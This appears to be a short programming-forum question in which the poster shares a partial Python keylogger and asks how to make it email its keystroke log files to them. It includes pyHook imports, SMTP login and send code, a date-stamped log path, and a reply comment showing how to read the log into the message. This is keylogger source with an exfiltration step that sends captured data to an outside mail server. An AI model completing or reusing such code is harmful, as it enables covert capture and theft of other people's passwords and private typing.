# Send keylogger log files to e-mail

Tags: python, email

I have a simple keylogger and I am trying to figure out how to make it send log files to my e-mail. Could someone tell me how to modify this code to make it send a .txt file?

```
import pyHook, pythoncom, smtplib
from datetime import datetime

smtpserver = 'smtp.live.com'
AUTHREQUIRED = 1 # if you need to use SMTP AUTH set to 1
smtpuser = 'xxxxxx'  # for SMTP AUTH, set SMTP username here
smtppass = 'xxxxxx'  # for SMTP AUTH, set SMTP password here

RECIPIENTS = 'xxxxx'
SENDER = 'xxxxx'
mssg = '????'
s = mssg   

server = smtplib.SMTP(smtpserver,587)
server.ehlo()
server.starttls() 
server.ehlo()
server.login(smtpuser,smtppass)
server.set_debuglevel(1)
server.sendmail(SENDER, [RECIPIENTS], s)
server.quit()
todays_date = datetime.now().strftime('%Y-%b-%d')
file_name = 'C:\log\\' + todays_date + '.txt'

line_buffer = "" #current typed line before return character
window_name = "" #current window
```

Comment: `s = open('myfile.txt').read()`